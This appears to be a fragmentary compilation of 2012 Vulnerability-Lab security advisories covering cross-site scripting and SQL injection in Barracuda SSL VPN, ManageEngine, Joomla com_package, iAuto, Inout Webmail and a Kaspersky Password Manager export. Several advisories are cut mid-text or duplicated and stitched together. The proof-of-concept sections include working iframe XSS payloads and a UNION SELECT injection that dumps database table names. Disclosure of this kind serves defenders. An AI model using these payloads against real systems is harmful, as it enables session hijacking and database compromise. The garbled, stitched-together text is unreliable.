from:"Vulnerability Lab"

 in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities

Title:
==
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities


Date:
=
2012-07-16


References:
===
http://vulnerability-lab.com/get_content.php?id=561

Barracuda Networks Security ID: BNSEC-278


VL-ID:
=
561


Common Vulnerability Scoring System:

3


Introduction:
=
The Barracuda SSL VPN is an integrated hardware and software solution enabling 
secure, clientless remote 
access to internal network resources from any Web browser. Designed for remote 
employees and road warriors, 
the Barracuda SSL VPN provides comprehensive control over file systems and 
Web-based applications requiring 
external access. The Barracuda SSL VPN integrates with third-party 
authentication mechanisms to control user 
access levels and provides single sign-on. 

Barracuda SSL VPN   

* Enables access to corporate intranets, file systems or other Web-based 
applications
* Tracks resource access through auditing and reporting facilities
* Scans uploaded files for viruses and malware
* Leverages multi-factor, layered authentication mechanisms, including RSA 
SecurID and VASCO tokens
* Integrates with existing Active Directory and LDAP directories
* Utilizes policies for granular access control framework
* Supports any Web browser on PC or Mac

(Copy of the Vendor Homepage: 
http://www.barracudanetworks.com/ns/products/sslvpn.php)


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the Barracuda  SSL VPN 680 appliance application.


Report-Timeline:

2012-06-09: Researcher Notification  Coordination
2012-06-10: Vendor Notification
2012-07-12: Vendor Response/Feedback
2012-07-14: Vendor Fix/Patch
2012-07-16: Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: SSL VPN Appliance v680 - 2.2.2.115


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non persistent cross site scripting vulnerabilities are detected in 
Barracuda SSL VPN 680 v2.2.2.115 appliance application.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with high required 
user inter action. The bugs are located in the fileSystem.do, 
showUserResourceCategories.do,launchAgent.do files with the bound 
vulnerable  policyLaunching, resourcePrefix, path  return-To parameters. 
Successful exploitation can result in account steal, 
phishing  client-side content request manipulation.

Vulnerable Module(s):
[+] 
showUserResourceCategories.domessageResourcesKey=resourceCategory
[+] 
fileSystem.do?launchId=l52ca6dactionTarget=listpath=
[+] launchAgent.do

Vulnerable Parameter(s):
[+] policyLaunching  resourcePrefix
[+] listpath
[+] return-To


Proof of Concept:
=
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers with medium or high required user inter action.
For demonstration or reproduce ...

1.1
https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesFormreadOnly=testpath=
%2FshowUserResourceCategories.domessageResourcesKey=resourceCategoryactionPath=[NON-PERSISTENT
 SCRIPT CODE!]


1.2
https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d[VALUE #2]=[VALUE 
#3][PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!]

PoC:
https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6dactionTarget=listpath=smb/Sales%20Folder/Testing
%20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


1.3
https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418returnTo=[NON-PERSISTENT
 SCRIPT CODE!]


Solution:
=
2012-07-14: Vendor Fix/Patch by Barracuda Networks


Risk:
=
The security risk of the non-persistent cross site scripting vulnerabilities 
are estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any

ME Application Manager 10 - Multiple Web Vulnerabilities

=showdetailsresourcename=DNS+monitorviewType=showResourceTypes

http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=1055attributeIDs=101
attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3Credirectto=/common/serverinfo.do

http://appmanager.127.0.0.1:1338/ProcessTemplates.do?method=createProcessTemplatetemplatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


Risk:
=
1.1
The security risk of the blind sql vulnerabilities are estimated as high.

1.2
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities

(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team]  -   Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

ME Mobile Application Manager v10 - SQL Vulnerabilities

Title:
==
ME Mobile Application Manager v10 - SQL Vulnerabilities


Date:
=
2012-07-04


References:
===
http://www.vulnerability-lab.com/get_content.php?id=628


VL-ID:
=
628


Common Vulnerability Scoring System:

8.1


Introduction:
=
ManageEngine Mobile Applications Manager is a server and application 
performance monitoring software that helps businesses 
ensure high availability and performance for their business applications by 
ensuring servers and applications have 
high uptime. The application performance management capability includes server 
monitoring, application server 
monitoring, database monitoring, web services monitoring, virtualization 
monitoring, cloud monitoring and an array of 
other application management capability that will help IT administrators manage 
their resources effectively.

Note: The mobile version 10 is compatible with Blackberry, Iphone  Android 
smartphones with IE, Safari or Firefox browser.

(Copy of the Vendor Homepage: 
http://www.manageengine.com/products/applications_manager )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple SQL Injection 
Vulnerabilities in Manage Engines Mobile Application Manager v10.


Report-Timeline:

2012-06-23: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Manage Engine
Product: Mobile Application Manager v10.0


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL Injection vulnerabilities  are detected  in Manage Engines Mobile 
Application Manager v10.
The vulnerability allows an attacker (remote) or local low privileged user 
account to inject/execute own sql commands 
on the affected application dbms without user inter action. The vulnerabilities 
are located in the DetailsView.do or Search.do 
module(s) and the bound vulnerable parameters showMGDetailsgroupId  viewName. 
Successful exploitation of the vulnerabilities 
result in dbms  application compromise via sql injection attack. 

Vulnerable Module(s):
[+] DetailsView.do
[+] Search.do

Vulnerable Parameter(s):
[+] showMGDetailsgroupId
[+] viewName


Proof of Concept:
=
The sql injection vulnerabilities in the mobile manager application can be 
exploited by remote attackers without user inter action.
For demonstration or reproduce ...

PoC:
http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetailsgroupId=10003645+UnION+
SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+
WHERE+table_schema=database()--%20-

http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch
requestid=[SQL INJECTION]mobileSearchPageviewName=Search


Risk:
=
The security risk of the  sql injection vulnerabilities are estimated as high.


Credits:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All

Kaspersky PM 5.0.0.164 - Software Filter Vulnerability

RoleValues
  RoleValue ID=118 RoleType=37/
  RoleValue ID=119 RoleType=38/
  RoleValue ID=120 RoleType=39/
  RoleValue ID=121 RoleType=40/
  RoleValue ID=122 RoleType=41/
  RoleValue ID=123 RoleType=42/
  RoleValue ID=124 RoleType=43/
  RoleValue ID=125 RoleType=44/
  RoleValue ID=126 RoleType=45/
  RoleValue ID=127 RoleType=46/
/RoleValues
  /CreditCard
/CreditCards
BankAccounts
  BankAccount Name=[PERSISTENt INJECTED SCRIPT CODE])  ID=128 
ParentID=62/
  BankAccount Name= ID=129 ParentID=62
RoleValues
  RoleValue ID=130 RoleType=47/
  RoleValue ID=131 RoleType=48/
  RoleValue ID=132 RoleType=49/
  RoleValue ID=133 RoleType=50/
  RoleValue ID=134 RoleType=51/
  RoleValue ID=135 RoleType=52/
  RoleValue ID=136 RoleType=53/
  RoleValue ID=137 RoleType=54/
  RoleValue ID=138 RoleType=55/
  RoleValue ID=139 RoleType=56/
/RoleValues
  /BankAccount
/BankAccounts
  /Identity
/Identities
  /Database
/root



Solution:
=
XML special characters in Item names need to be encoded when processing to 
export as HTML file.


Risk:
=
The security risk of the persistent software vulnerability is estimated as 
low(+)/(-)medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Kaspersky Password Manager 5.0.0.164 - Software Filter Vulnerability

2012-08-02 Thread Vulnerability Lab

RoleValues
  RoleValue ID=118 RoleType=37/
  RoleValue ID=119 RoleType=38/
  RoleValue ID=120 RoleType=39/
  RoleValue ID=121 RoleType=40/
  RoleValue ID=122 RoleType=41/
  RoleValue ID=123 RoleType=42/
  RoleValue ID=124 RoleType=43/
  RoleValue ID=125 RoleType=44/
  RoleValue ID=126 RoleType=45/
  RoleValue ID=127 RoleType=46/
/RoleValues
  /CreditCard
/CreditCards
BankAccounts
  BankAccount Name=[PERSISTENt INJECTED SCRIPT CODE])  ID=128 
ParentID=62/
  BankAccount Name= ID=129 ParentID=62
RoleValues
  RoleValue ID=130 RoleType=47/
  RoleValue ID=131 RoleType=48/
  RoleValue ID=132 RoleType=49/
  RoleValue ID=133 RoleType=50/
  RoleValue ID=134 RoleType=51/
  RoleValue ID=135 RoleType=52/
  RoleValue ID=136 RoleType=53/
  RoleValue ID=137 RoleType=54/
  RoleValue ID=138 RoleType=55/
  RoleValue ID=139 RoleType=56/
/RoleValues
  /BankAccount
/BankAccounts
  /Identity
/Identities
  /Database
/root



Solution:
=
XML special characters in Item names need to be encoded when processing to 
export as HTML file.


Risk:
=
The security risk of the persistent software vulnerability is estimated as 
low(+)/(-)medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: ad...@vulnerability-lab.com

Joomla com_package - SQL Injection Vulnerability

Title:
==
Joomla com_package - SQL Injection Vulnerability


Date:
=
2012-07-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=652


VL-ID:
=
652


Common Vulnerability Scoring System:

8.3


Introduction:
=
Joomla is a free and open source content management system (CMS) for publishing 
content on the World
Wide Web and intranets and a model–view–controller (MVC) Web application 
framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and 
software design
patterns, stores data in a MySQL database, and includes features such as page 
caching,
RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and 
support for language
internationalization.
Joomla had been downloaded 23 million times. Between March 2007 and February 
2011 there had been
more than 21 million downloads. As of November 2011, there are over 8,600 free 
and commercial
extensions available from the official Joomla! Extension Directory and more 
available from other sources.

(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla)


Abstract:
=
A Vulnerability-Lab researcher discovered a SQL injection vulnerability in the 
com_package module of the joomla CMS.


Report-Timeline:

2012-07-08: Public or Non-Public Disclosure



Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A SQL Injection vulnerability is detected in the com_package module of the 
joomla Content Management System.
Remote attackers  low privileged user accounts can execute/inject own sql 
commands to compromise the application dbms.
The vulnerability is located in the com_package module with the bound 
vulnerable id parameter. Successful exploitation 
of the vulnerability result in dbms (Server) or application (Web) compromise.

Vulnerable Module(s):
[+] index.php?option=com_package

Vulnerable Parameter(s):
[+] id


Proof of Concept:
=
The SQL Injection vulnerabilities can be exploited by remote attackers without 
privileged user account or 
required user inter action. For demonstration or reproduce ...

PoC:

Path:   /
File:   index.php
Module: ?option=com_package
Parameter:  detailsid=-1'[SQL Injection]--
URL:
http://www.xxx.com/index.php?option=com_packagetask=detailsid=174-1'[SQL 
Injection]--


Risk:
=
The security risk of the remote SQL Injection vulnerability is estimated as 
critical.


Credits:

Vulnerability Research Laboratory -  Chokri Ben Achor 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission

iAuto Mobile Application 2012 - Multiple Web Vulnerabilities

%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+
width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3CState[equal]=11action=search


Browse by Make and Model / AC Cobra / 

PoC:
http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20
width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/


Comments  Reply to The Comment  Topic  Text (commentSid)

PoC:
http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000
%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3CreturnBackUri=%2Flisting%2Fcomments%2F448%2F%3F



Risk:
=
1.1
The security risk of the persistent input validation vulnerability is estimated 
as medium(+).

1.2
The security risk of the non-persistent cross site scripting vulnerabilities 
are estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Inout Mobile Webmail APP - Multiple Web Vulnerabilities

Title:
==
Inout Mobile Webmail APP  - Multiple Web Vulnerabilities


Date:
=
2012-06-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=609


VL-ID:
=
609


Common Vulnerability Scoring System:

3.5


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web 
vulnerabilities in the  inoutscripts mobile Inoutmail Webmail CMS 2012.


Report-Timeline:

2012-06-08: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the  
inoutscripts mobile Inoutmail CMS 2012.
The bugs allow remote attackers to implement/inject malicious script code on 
the application side (persistent). 
Successful exploitation of the vulnerability can lead to session hijacking 
(manager/admin) or stable (persistent) 
context manipulation. Exploitation requires low user inter action  privileged 
user account. The persistent valiation 
vulnerabilities are located in the new mail  contacts modules with the bound 
values to, bcc, cc. The bug can be 
exploited by remote attackers. The attacker is sending a malicious mail with 
vulnerable script code values as content.
The admin or customer is watching the arriving mail and the persistent script 
code in To or Bcc inputs. The context will
be executed (persistent) when the user,customer or admin is processing to check 
his mails. A privileged user account can 
also use the bug to save it persistent for higher privileged user account 
exploitation.

Vulnerable Module(s):
[+] New Mail
[+] Contacts

Vulnerable Parameter(s):
[+] To
[+] Cc
[+] Bcc


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user inter action. For demonstration or reproduce ...

Insert the demonstration string to the Bcc, Cc  To of the send new mail. 
Secound possibility is to send a mail from outside to the inout webmail with 
the string code values.

PoC:
iframe src=http://vuln-lab.com onload=alert(VL) 


Risk:
=
The security risk of the persistent input validation vulnerabilities are 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team]  -snup (s...@vulnerability-lab.com 
[http://snup1.blogspot.com]


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

